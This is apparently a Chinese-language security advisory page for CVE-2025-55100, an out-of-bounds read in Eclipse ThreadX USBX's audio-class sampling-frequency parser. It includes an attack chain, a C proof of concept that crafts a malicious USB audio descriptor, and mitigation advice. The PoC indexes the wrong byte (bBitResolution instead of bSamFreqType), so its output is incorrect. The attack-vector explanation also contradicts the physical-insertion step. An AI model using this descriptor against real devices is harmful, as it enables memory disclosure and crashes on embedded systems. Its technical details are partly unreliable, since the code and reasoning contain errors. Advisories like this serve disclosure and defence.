CVE-2025-55100 Eclipse ThreadX USBX音频类采样频率解析越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-55100

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse Foundation ThreadX USBX（USB支持模块）

漏洞概述

CVE-2025-55100是Eclipse基金会ThreadX操作系统USB支持模块USBX中的一个严重安全漏洞。该漏洞存在于USBX 6.4.3之前的版本中，具体位于音频类驱动程序的采样频率解析函数_ux_host_class_audio10_sam_parse_func()中。当USB主机栈解析USB音频设备描述符中的采样频率列表（采样频率列表是音频类接口描述符的一部分）时，由于缺乏对输入数据的有效边界检查，可能导致越界读取操作的发生。

该漏洞由安全研究员[email protected]发现并报告，于2025年10月17日正式公开披露。CVSS 3.1基础评分高达9.1分，属于严重级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何权限（PR:N）和用户交互（UI:N）。从CVSS向量可以看出，该漏洞对机密性产生高影响（C:H），对完整性无影响（I:N），对可用性产生高影响（A:H）。这意味着攻击者可以利用此漏洞读取未授权的内存内容，并可能导致系统崩溃或拒绝服务。

由于USBX广泛应用于嵌入式系统和物联网设备中，该漏洞可能影响大量使用ThreadX实时操作系统的工业控制设备、医疗设备、消费电子等产品。攻击者可以通过物理接入或恶意USB设备触发该漏洞，对设备安全构成严重威胁。

技术细节

USBX是Eclipse ThreadX实时操作系统的USB主机和设备栈实现，支持USB音频类（Audio Class 1.0）设备。USB音频类设备通过接口描述符中的Type I格式描述符来声明其支持的采样频率范围，采样频率列表以三字节三元组（最低采样频率、最高采样频率、采样频率分辨率）的形式存储在描述符中。

漏洞存在于函数_ux_host_class_audio10_sam_parse_func()中，该函数负责解析音频类设备的采样频率信息。在解析过程中，函数需要遍历描述符中的采样频率三元组列表。然而，由于USB描述符中的字段（如bLength、bSamFreqType等）来自外部设备，攻击者可以构造恶意的USB音频设备描述符，使bSamFreqType字段的值超出实际可用的三元组数量。当函数按照bSamFreqType指定的数量遍历三元组时，会越过分配的缓冲区边界读取相邻内存中的数据。

具体利用方式如下：
1. 攻击者构造一个恶意的USB音频设备，其描述符中bSamFreqType字段被设置为大于实际三元组数量的值；
2. 当受影响的USBX主机栈枚举该设备并调用_ux_host_class_audio10_sam_parse_func()解析采样频率时；
3. 函数按照bSamFreqType的值进行循环读取，导致越界访问堆或栈内存；
4. 越界读取的数据可能包含敏感信息（如内存中的密钥、指针等），同时也可能触发内存访问异常导致系统崩溃。

该漏洞的根本原因是输入验证不足，函数未对bSamFreqType与描述符实际长度之间的关系进行校验，未确保三元组数量与描述符大小匹配。

攻击链分析

STEP 1

步骤1：构造恶意USB设备

攻击者使用可编程USB设备（如基于STM32或Teensy的设备）制作一个伪装为USB音频设备的恶意硬件。在设备的固件中，修改USB音频类描述符，将bSamFreqType字段设置为远大于实际三元组数量的值（例如255），但描述符的实际长度只包含少量三元组数据。

STEP 2

步骤2：物理接入目标设备

攻击者通过物理接触将恶意USB设备插入运行受影响USBX版本的目标嵌入式系统。由于CVSS向量中攻击向量为网络（AV:N），在USB上下文中这意味着通过USB接口即可触发，无需特殊物理访问权限。

STEP 3

步骤3：触发描述符解析

目标设备的USBX主机栈在枚举过程中检测到音频类设备，调用_ux_host_class_audio10_sam_parse_func()函数解析音频格式描述符中的采样频率信息。

STEP 4

步骤4：越界读取执行

解析函数按照bSamFreqType=255的值进行循环，遍历255个采样频率三元组，但描述符缓冲区中只存在1个三元组，导致函数读取超出分配缓冲区边界的数据，可能读取到敏感内存内容。

STEP 5

步骤5：信息泄露或拒绝服务

越界读取可能导致敏感信息泄露（如相邻内存中的加密密钥、用户凭证等），同时也可能触发内存保护异常导致系统崩溃，造成拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-55100 PoC - Malicious USB Audio Device Descriptor
// This PoC demonstrates how to craft a malicious USB Audio 1.0 descriptor
// that triggers the out-of-bounds read in _ux_host_class_audio10_sam_parse_func()

#include <stdio.h>
#include <string.h>
#include <stdint.h>

// USB Audio 1.0 Type I Format Type Descriptor
typedef struct {
    uint8_t bLength;
    uint8_t bDescriptorType;       // 0x24 (CS_INTERFACE)
    uint8_t bDescriptorSubtype;    // 0x02 (FORMAT_TYPE)
    uint8_t bFormatType;           // 0x01 (TYPE_I)
    uint8_t bNrChannels;
    uint8_t bSubframeSize;
    uint8_t bBitResolution;
    uint8_t bSamFreqType;
    // Followed by bSamFreqType * 3 bytes of sampling frequency triplets
} __attribute__((packed)) USB_Audio_Format_TypeI;

// Malicious descriptor with inflated bSamFreqType
uint8_t malicious_descriptor[] = {
    // Audio Control Interface Header
    0x09, 0x24, 0x01, 0x00, 0x01, 0x29, 0x00, 0x01, 0x01,
    // Format Type I Descriptor - bLength=10 (only 1 triplet fits)
    0x0A,       // bLength = 10 (header 7 bytes + 1 triplet of 3 bytes)
    0x24,       // bDescriptorType = CS_INTERFACE
    0x02,       // bDescriptorSubtype = FORMAT_TYPE
    0x01,       // bFormatType = TYPE_I
    0x01,       // bNrChannels = 1
    0x02,       // bSubframeSize = 2 bytes
    0x10,       // bBitResolution = 16 bits
    0xFF,       // bSamFreqType = 255 (MALICIOUS - claims 255 triplets but only 1 exists)
    // Only one actual sampling frequency triplet (3 bytes)
    0x44, 0xAC, 0x00  // 44100 Hz (0x00AC44)
};

void craft_malicious_usb_audio_device(void) {
    // The vulnerability triggers when:
    // 1. bSamFreqType (0xFF = 255) indicates 255 sampling frequency triplets
    // 2. But the actual descriptor only contains 1 triplet
    // 3. _ux_host_class_audio10_sam_parse_func() loops 255 times
    // 4. After the first triplet, it reads beyond the descriptor buffer
    // 5. This causes an out-of-bounds read of 254*3 = 762 bytes
    
    printf("Malicious USB Audio descriptor crafted.\n");
    printf("bSamFreqType: %d (claims %d triplets)\n", 
           malicious_descriptor[15], malicious_descriptor[15]);
    printf("Actual triplets in descriptor: 1\n");
    printf("OOB read size: %d bytes\n", 
           (malicious_descriptor[15] - 1) * 3);
    
    // In a real attack scenario, this descriptor would be embedded in a
    // malicious USB device firmware (e.g., using a USB Rubber Ducky or
    // a programmable USB HID device like a BadUSB)
}

int main(void) {
    craft_malicious_usb_audio_device();
    return 0;
}

影响范围

Eclipse ThreadX USBX < 6.4.3

防御指南

临时缓解措施

在无法立即升级到USBX 6.4.3版本的情况下，建议采取以下临时缓解措施：1）在固件层面禁用USB音频类主机驱动，避免系统枚举和解析USB音频设备；2）在硬件层面限制USB端口的物理访问，仅允许授权人员接入USB设备；3）在操作系统层面实施USB设备过滤策略，拒绝未识别的USB音频设备；4）增加USB描述符解析的边界检查代码，在调用_ux_host_class_audio10_sam_parse_func()之前验证描述符长度与bSamFreqType字段的一致性；5）启用内存保护单元（MPU）或内存管理单元（MMU）配置，将USB描述符缓冲区设置为受保护区域，限制越界访问的影响范围。